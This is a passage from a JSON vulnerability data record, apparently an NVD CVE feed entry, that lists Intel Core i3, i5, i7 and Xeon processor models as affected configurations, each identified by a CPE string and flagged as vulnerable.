                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3110m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2377m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2348m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2340ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2125:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:390m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:350m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:965:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:940xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3740qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3537u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2715qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2710qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2640m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2637m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3350p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3320m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3210m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2520m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2515e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2510e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2435m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2380p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2320:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:661:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:540um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:430um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:430m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3225:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3115c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2357m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2350m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:380m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:370m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:980x:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:975:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3635qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3632qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3630qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3555le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2760qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2655le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2649m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2617m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2610ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:610e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:875k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:870s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620le:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l3406:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w3690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5549:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5518:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5508:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5503:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5502:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5667:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5618:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5609:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5649:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5603:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x6550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l7545:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e7540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:470um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3245:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3210:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2375m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2370m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2328m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2115c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:330e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2960xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:920xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3840qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3720qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3689y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2677m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2635qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2630qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:920:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:960:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:950:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:940:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:840qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:740qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640lm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3450:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3440:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5528:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w5580:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5509:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5507:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5677:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5647:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5640:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5630:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5620:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x7560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x7550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1505m_v6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1575m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1565l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1271_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1231_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e-1105c:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1515m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1278l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1281_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1246_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1226_v3:-:*:*:*:*:*:*:*",
